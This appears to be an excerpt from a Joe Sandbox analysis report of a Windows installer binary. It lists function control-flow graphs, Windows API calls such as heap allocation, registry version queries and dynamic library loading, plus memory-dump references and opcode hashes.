                                                                                                                                                                              control_flow_graph 264 d97f27-d97f3b GetLastError 265 d97f3d-d97f45 call d99c6f 264->265 266 d97f57-d97f61 call d99cae 264->266 271 d97f52 265->271 272 d97f47-d97f50 265->272 273 d97f63-d97f65 266->273 274 d97f67-d97f6f call d99720 266->274 271->266 275 d97fcc-d97fd7 SetLastError 272->275 273->275 277 d97f74-d97f7a 274->277 278 d97f8d-d97f9b call d99cae 277->278 279 d97f7c-d97f8b call d99cae 277->279 285 d97f9d-d97fab call d99cae 278->285 286 d97fb4-d97fc9 call d97c04 call d9817e 278->286 284 d97fac-d97fb2 call d9817e 279->284 293 d97fcb 284->293 285->284 286->293 293->275
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetLastError.KERNEL32(00000001,0000000B,00D85304,00D981FB,00000009,?,00D8142C,0000000B,00000009,00000009,?,?,00BB079C,0000000D,0000000D), ref: 00D97F2B
                                                                                                                                                                              • SetLastError.KERNEL32(00000000), ref: 00D97FCD
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2947616455.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000003.00000002.2947563281.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948103378.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948275777.0000000000E9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948370821.0000000000E9E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948463281.0000000000E9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948530636.0000000000EAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: ErrorLast
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 1452528299-0
                                                                                                                                                                              • Opcode ID: 95cca5272d5e3c4f41446a657eeeb14a35699206de093e8b6648e033c0c117aa
                                                                                                                                                                              • Instruction ID: 0f9845604d57b5349fec519b4752e4be5bef585b6bd6dd7a3e0ed5886a887b9a
                                                                                                                                                                              • Opcode Fuzzy Hash: 95cca5272d5e3c4f41446a657eeeb14a35699206de093e8b6648e033c0c117aa
                                                                                                                                                                              • Instruction Fuzzy Hash: C1112B3121E2016EDF013FFAACC5D2B669DEF057747240239F108B21A2EA118C089171
                                                                                                                                                                              Function 00CD1040 Relevance: 1.5, APIs: 1, Instructions: 39COMMON
                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                              • Executed
                                                                                                                                                                              • Not Executed
                                                                                                                                                                              control_flow_graph 296 cd1040-cd1075 297 cd10be-cd10d1 296->297 298 cd1077-cd108b call d80260 296->298 298->297 301 cd108d-cd10a5 call cd0d50 call cd10e0 298->301 305 cd10aa-cd10bb call d80216 301->305 305->297
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 00D80260: EnterCriticalSection.KERNEL32(00E9FF6C,?,?,?,00BAAD96,00EA0B9C,E5106CA8,?,?,00DA83BD,000000FF,?,00BA1177,E5106CA8,?,00DAA90F), ref: 00D8026B
                                                                                                                                                                                • Part of subcall function 00D80260: LeaveCriticalSection.KERNEL32(00E9FF6C,?,?,?,00BAAD96,00EA0B9C,E5106CA8,?,?,00DA83BD,000000FF,?,00BA1177,E5106CA8,?,00DAA90F), ref: 00D802A8
                                                                                                                                                                                • Part of subcall function 00CD10E0: RegOpenKeyExW.KERNEL32(80000002,Software\Microsoft\Windows NT\CurrentVersion,00000000,00020119,00000000), ref: 00CD114E
                                                                                                                                                                                • Part of subcall function 00CD10E0: RegQueryValueExW.KERNEL32(00000000,CurrentMajorVersionNumber,00000000,00000000,?,?), ref: 00CD1195
                                                                                                                                                                                • Part of subcall function 00CD10E0: RegQueryValueExW.KERNEL32(00000000,CurrentMinorVersionNumber,00000000,00000000,?,00000004), ref: 00CD11B4
                                                                                                                                                                                • Part of subcall function 00CD10E0: RegQueryValueExW.ADVAPI32(00000000,CurrentVersion,00000000,00000000,?,?), ref: 00CD11E3
                                                                                                                                                                                • Part of subcall function 00CD10E0: RegQueryValueExW.KERNEL32(00000000,CurrentBuildNumber,00000000,00000000,?,?), ref: 00CD1258
                                                                                                                                                                              • __Init_thread_footer.LIBCMT ref: 00CD10B6
                                                                                                                                                                                • Part of subcall function 00D80216: EnterCriticalSection.KERNEL32(00E9FF6C,?,?,00BAAE07,00EA0B9C,00E0A670), ref: 00D80220
                                                                                                                                                                                • Part of subcall function 00D80216: LeaveCriticalSection.KERNEL32(00E9FF6C,?,?,00BAAE07,00EA0B9C,00E0A670), ref: 00D80253
                                                                                                                                                                                • Part of subcall function 00D80216: RtlWakeAllConditionVariable.NTDLL ref: 00D802CA
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2947616455.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000003.00000002.2947563281.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948103378.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948275777.0000000000E9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948370821.0000000000E9E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948463281.0000000000E9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948530636.0000000000EAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CriticalQuerySectionValue$EnterLeave$ConditionInit_thread_footerOpenVariableWake
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 3563064969-0
                                                                                                                                                                              • Opcode ID: 9f2850d66d4e28f434359c9a9c912132062bb45eebf02e1c0d22cc962ccadad5
                                                                                                                                                                              • Instruction ID: f8e8516142909df72841f5a0fb096e39cbd4b5dd13fce6aa336f703a6bec7d2a
                                                                                                                                                                              • Opcode Fuzzy Hash: 9f2850d66d4e28f434359c9a9c912132062bb45eebf02e1c0d22cc962ccadad5
                                                                                                                                                                              • Instruction Fuzzy Hash: 9301F771B40644EFC310EB59DD02B19B3B4E70AB30F144326EE31AB3C0CA71BA048B52
                                                                                                                                                                              Function 00D99720 Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE
                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                              • Executed
                                                                                                                                                                              • Not Executed
                                                                                                                                                                              control_flow_graph 308 d99720-d9972b 309 d99739-d9973f 308->309 310 d9972d-d99737 308->310 312 d99758-d99769 RtlAllocateHeap 309->312 313 d99741-d99742 309->313 310->309 311 d9976d-d99778 call d852ff 310->311 317 d9977a-d9977c 311->317 314 d9976b 312->314 315 d99744-d9974b call d9792b 312->315 313->312 314->317 315->311 321 d9974d-d99756 call d95443 315->321 321->311 321->312
                                                                                                                                                                              APIs
                                                                                                                                                                              • RtlAllocateHeap.NTDLL(00000008,0000000D,00000001,?,00D97F74,00000001,00000364,00000001,00000006,000000FF,?,00D8142C,0000000B,00000009,00000009), ref: 00D99761
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2947616455.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000003.00000002.2947563281.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948103378.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948275777.0000000000E9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948370821.0000000000E9E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948463281.0000000000E9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948530636.0000000000EAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: AllocateHeap
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 1279760036-0
                                                                                                                                                                              • Opcode ID: 4465cbe7382cb8ef3a4627ae1fe176e67da5aeb91f6e9298fe50badbaa310e52
                                                                                                                                                                              • Instruction ID: a348efbaa3341ea12f4806906a88e2338402ce45b70c28ab446868803f81fd9d
                                                                                                                                                                              • Opcode Fuzzy Hash: 4465cbe7382cb8ef3a4627ae1fe176e67da5aeb91f6e9298fe50badbaa310e52
                                                                                                                                                                              • Instruction Fuzzy Hash: DEF0E931530624ABEF213FEEAD11B9AB7C9EF41770B188019B805AB080DE20D80186F1
                                                                                                                                                                              Function 00BAA9B0 Relevance: 1.5, APIs: 1, Instructions: 34memoryCOMMON
                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                              • Executed
                                                                                                                                                                              • Not Executed
                                                                                                                                                                              control_flow_graph 324 baa9b0-baaa0e call baa9a0 call d81aea RtlAllocateHeap
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 00D81AEA: RaiseException.KERNEL32(E06D7363,00000001,00000003,00000009,?,00000009,?,00D7D7B0,00000009,00E965FC,00000000,00000009), ref: 00D81B4A
                                                                                                                                                                              • RtlAllocateHeap.NTDLL(?,00000000,?,E5106CA8,00000000,00DA7E40,000000FF,?,?,00E9717C,?,00BA11E6,80004005,E5106CA8,?,00DAA90F), ref: 00BAA9FA
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2947616455.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000003.00000002.2947563281.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948103378.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948275777.0000000000E9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948370821.0000000000E9E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948463281.0000000000E9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948530636.0000000000EAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: AllocateExceptionHeapRaise
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 3789339297-0
                                                                                                                                                                              • Opcode ID: 791575064c38c9ce17e6c8ffcfda8aebd8a9d11cb7ece28f7b9e4b7075e33328
                                                                                                                                                                              • Instruction ID: 5437f2b4f79dd54f5ecbf7b461b5ed4637e998ac252313206926038e89d6ffab
                                                                                                                                                                              • Opcode Fuzzy Hash: 791575064c38c9ce17e6c8ffcfda8aebd8a9d11cb7ece28f7b9e4b7075e33328
                                                                                                                                                                              • Instruction Fuzzy Hash: FFF0A031A48248FFCB05DF54DC02F5ABBA8FB09B10F10866AF915926A0DB36A905CB64

                                                                                                                                                                              Non-executed Functions

                                                                                                                                                                              Function 00BB6670 Relevance: 12.4, APIs: 8, Instructions: 389nativememoryCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 00BB6B00: EnterCriticalSection.KERNEL32(00EA699C,E5106CA8,00000002,00000000,00DAB45D,000000FF,?,00BB5A77,00000002,00000000,E5106CA8), ref: 00BB6B3D
                                                                                                                                                                                • Part of subcall function 00BB6B00: LoadCursorW.USER32(00000000,00007F00), ref: 00BB6BB8
                                                                                                                                                                                • Part of subcall function 00BB6B00: LoadCursorW.USER32(00000000,00007F00), ref: 00BB6C5E
                                                                                                                                                                              • SysFreeString.OLEAUT32(00000000), ref: 00BB6713
                                                                                                                                                                              • NtdllDefWindowProc_W.NTDLL(?,?,00000001,?), ref: 00BB6844
                                                                                                                                                                              • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00BB6926
                                                                                                                                                                              • GlobalLock.KERNEL32(00000000), ref: 00BB6934
                                                                                                                                                                              • GlobalUnlock.KERNEL32(?), ref: 00BB6988
                                                                                                                                                                              • SysFreeString.OLEAUT32(00000000), ref: 00BB6A2C
                                                                                                                                                                              • NtdllDefWindowProc_W.NTDLL(?,?,?,00000000), ref: 00BB6A73
                                                                                                                                                                              • SysFreeString.OLEAUT32(00000000), ref: 00BB6A92
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2947616455.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000003.00000002.2947563281.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948103378.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948275777.0000000000E9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948370821.0000000000E9E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948463281.0000000000E9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948530636.0000000000EAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: FreeGlobalString$CursorLoadNtdllProc_Window$AllocCriticalEnterLockSectionUnlock
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 306625881-0
                                                                                                                                                                              • Opcode ID: 62e8abd6381b3f7f5024074446f5d45e5ec1f76b1de1c1e90b601dc42c2d9b00
                                                                                                                                                                              • Instruction ID: 216102286f4eae4a2085ab877fc3cb273e191611e8525b8403460f4dbf7dacdc
                                                                                                                                                                              • Opcode Fuzzy Hash: 62e8abd6381b3f7f5024074446f5d45e5ec1f76b1de1c1e90b601dc42c2d9b00
                                                                                                                                                                              • Instruction Fuzzy Hash: 47D1AE71900205AFDF10DFA5CC48BBEBBF8EF45714F1481A9E911A7290DBB99E04CBA1
                                                                                                                                                                              Function 00D7F896 Relevance: 9.0, APIs: 6, Instructions: 41memoryCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • IsProcessorFeaturePresent.KERNEL32(0000000C,00D7F7B2,00000000,?,00D7F94A,00000000,?,?,00BB8164,?), ref: 00D7F898
                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,00000008,00000000,00000000,?,?,00BB8164,?), ref: 00D7F8BF
                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000,?,?,00BB8164,?), ref: 00D7F8C6
                                                                                                                                                                              • InitializeSListHead.KERNEL32(00000000,?,?,00BB8164,?), ref: 00D7F8D3
                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000,?,?,00BB8164,?), ref: 00D7F8E8
                                                                                                                                                                              • HeapFree.KERNEL32(00000000,?,?,00BB8164,?), ref: 00D7F8EF
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2947616455.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000003.00000002.2947563281.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948103378.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948275777.0000000000E9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948370821.0000000000E9E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948463281.0000000000E9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948530636.0000000000EAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Heap$Process$AllocFeatureFreeHeadInitializeListPresentProcessor
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 1475849761-0
                                                                                                                                                                              • Opcode ID: b8388a6902e59a8ae240f1d3d175cc0e65c70fc1a13d590b55eb4f2920c65cb9
                                                                                                                                                                              • Instruction ID: aaa7302cbc80432ba9c6d3cc009c2f6a3e5db9f3acee5ac09d83a4ccde6d1afd
                                                                                                                                                                              • Opcode Fuzzy Hash: b8388a6902e59a8ae240f1d3d175cc0e65c70fc1a13d590b55eb4f2920c65cb9
                                                                                                                                                                              • Instruction Fuzzy Hash: C7F04F71741602DFE7209F7AAC08B1676E8EF99712F244539F945E3250EB31C845CA71
                                                                                                                                                                              Function 00BB5FA7 Relevance: 7.9, APIs: 5, Instructions: 384COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2947616455.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000003.00000002.2947563281.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948103378.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948275777.0000000000E9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948370821.0000000000E9E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948463281.0000000000E9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948530636.0000000000EAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: 459b9e69d198fa0aa10f426e85a8a9a0fda0477f50ffa21e79a4a28b7c5d1165
                                                                                                                                                                              • Instruction ID: 554a575f8e64b48ef56620cf1cdecd84fe584e1de509e883c2815028d1f0da13
                                                                                                                                                                              • Opcode Fuzzy Hash: 459b9e69d198fa0aa10f426e85a8a9a0fda0477f50ffa21e79a4a28b7c5d1165
                                                                                                                                                                              • Instruction Fuzzy Hash: B1D1CE71A012059FDB10EF69DC84BBEBBF8EF45310F2441A9E905E7291DBB99D04CBA1
                                                                                                                                                                              Function 00CAA9B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 367COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • MulDiv.KERNEL32(?,00000000), ref: 00CAACDA
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2947616455.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000003.00000002.2947563281.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948103378.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948275777.0000000000E9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948370821.0000000000E9E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948463281.0000000000E9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948530636.0000000000EAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: NumberValidationTipMsg$NumberValidationTipTitle$Segoe UI
                                                                                                                                                                              • API String ID: 0-2319862951
                                                                                                                                                                              • Opcode ID: e3dde65f2beaeb9e5768ec9d6a56e04446ed6b7fb23a9c0bf44ce35239333e13
                                                                                                                                                                              • Instruction ID: 426aa9ecf198101c19ab60b7a9f6535b9078ce07a526a181c5cf03bba133c13f
                                                                                                                                                                              • Opcode Fuzzy Hash: e3dde65f2beaeb9e5768ec9d6a56e04446ed6b7fb23a9c0bf44ce35239333e13
                                                                                                                                                                              • Instruction Fuzzy Hash: 39D1D331A00605AFEB14CF24CC95BEEB7F1FF49304F108699E55AA72D1DB746A49CB90
                                                                                                                                                                              Function 00CC76D0 Relevance: 23.1, APIs: 11, Strings: 2, Instructions: 390libraryloaderCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • LoadLibraryW.KERNEL32(Advapi32.dll,E5106CA8,?,00000000), ref: 00CC7761
                                                                                                                                                                              • GetLastError.KERNEL32(?,00000000), ref: 00CC778F
                                                                                                                                                                                • Part of subcall function 00BAA9B0: RtlAllocateHeap.NTDLL(?,00000000,?,E5106CA8,00000000,00DA7E40,000000FF,?,?,00E9717C,?,00BA11E6,80004005,E5106CA8,?,00DAA90F), ref: 00BAA9FA
                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,ConvertStringSidToSidW), ref: 00CC77A5
                                                                                                                                                                              • FreeLibrary.KERNEL32(00000000,?,00000000), ref: 00CC77BE
                                                                                                                                                                              • GetLastError.KERNEL32(?,00000000), ref: 00CC77CB
                                                                                                                                                                              • GetLastError.KERNEL32 ref: 00CC79B9
                                                                                                                                                                              • GetLastError.KERNEL32 ref: 00CC7A1E
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2947616455.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000003.00000002.2947563281.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948103378.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948275777.0000000000E9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948370821.0000000000E9E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948463281.0000000000E9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948530636.0000000000EAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: ErrorLast$Library$AddressAllocateFreeHeapLoadProc
                                                                                                                                                                              • String ID: Advapi32.dll$ConvertStringSidToSidW
                                                                                                                                                                              • API String ID: 3460774402-1129428314
                                                                                                                                                                              • Opcode ID: db11c3bf66e9d273c9b2e9935a426c49aadd023e462c544fab9d578f819bc14e
                                                                                                                                                                              • Instruction ID: cdc7d3bb30cb49d0c10d8ca24c22ea7e33547cd59e4efebd0dd9b9e108aeb7f5
                                                                                                                                                                              • Opcode Fuzzy Hash: db11c3bf66e9d273c9b2e9935a426c49aadd023e462c544fab9d578f819bc14e
                                                                                                                                                                              • Instruction Fuzzy Hash: 9EF157B1C05209AFDB10DF94C945BEEBBB4FF04310F248229E915B7290E775AA59CFA1
                                                                                                                                                                              Function 00BDC690 Relevance: 21.4, APIs: 4, Strings: 8, Instructions: 358libraryloaderCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • LoadLibraryExW.KERNEL32(?,00000000,00000000,?,?,00000043), ref: 00BDC7B8
                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,InitializeEmbeddedUI), ref: 00BDC7D1
                                                                                                                                                                              • GetProcAddress.KERNEL32(00000043,ShutdownEmbeddedUI), ref: 00BDC7DD
                                                                                                                                                                              • GetProcAddress.KERNEL32(00000043,EmbeddedUIHandler), ref: 00BDC7EA
                                                                                                                                                                                • Part of subcall function 00BAA9B0: RtlAllocateHeap.NTDLL(?,00000000,?,E5106CA8,00000000,00DA7E40,000000FF,?,?,00E9717C,?,00BA11E6,80004005,E5106CA8,?,00DAA90F), ref: 00BAA9FA
                                                                                                                                                                                • Part of subcall function 00BAACF0: GetProcessHeap.KERNEL32 ref: 00BAAD45
                                                                                                                                                                                • Part of subcall function 00BAACF0: __Init_thread_footer.LIBCMT ref: 00BAAD77
                                                                                                                                                                                • Part of subcall function 00BAACF0: __Init_thread_footer.LIBCMT ref: 00BAAE02
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2947616455.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000003.00000002.2947563281.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948103378.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948275777.0000000000E9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948370821.0000000000E9E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948463281.0000000000E9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948530636.0000000000EAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: AddressProc$HeapInit_thread_footer$AllocateLibraryLoadProcess
                                                                                                                                                                              • String ID: build $20.9$EmbeddedUIHandler$INAN$InitializeEmbeddedUI$SELECT `Data` FROM `Binary` WHERE `Name` = 'InstallerAnalytics.dll'$ShutdownEmbeddedUI$d71a6aa0
                                                                                                                                                                              • API String ID: 2564778481-2118497109
                                                                                                                                                                              • Opcode ID: 5bb7c95a19edc89883312135c84d6e3867f7c0cf7e1a2d0c274fe7cc9954869c
                                                                                                                                                                              • Instruction ID: 7d17eee2ebf4477023d65591a277e1b6ff18fa4f8856fac3cb5fc36f9b07aeab
                                                                                                                                                                              • Opcode Fuzzy Hash: 5bb7c95a19edc89883312135c84d6e3867f7c0cf7e1a2d0c274fe7cc9954869c
                                                                                                                                                                              • Instruction Fuzzy Hash: 04D17E7190020AAFDB04DFA4CC55BEEBBF4FF09714F14465AE815A7391EB74AA44CBA0
                                                                                                                                                                              Function 00BAEED0 Relevance: 21.2, APIs: 7, Strings: 5, Instructions: 233libraryloaderCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • LoadLibraryW.KERNEL32(combase.dll,RoGetActivationFactory), ref: 00BAEEDE
                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,combase.dll), ref: 00BAEEE4
                                                                                                                                                                              • LoadLibraryW.KERNEL32(combase.dll,CoIncrementMTAUsage,?,?), ref: 00BAEF17
                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,combase.dll), ref: 00BAEF1D
                                                                                                                                                                              • LoadLibraryW.KERNEL32(?,.dll,00000004,-00000001,00000000,00E172AC,00000000,00000000,00000000), ref: 00BAF03D
                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,DllGetActivationFactory), ref: 00BAF086
                                                                                                                                                                              Strings
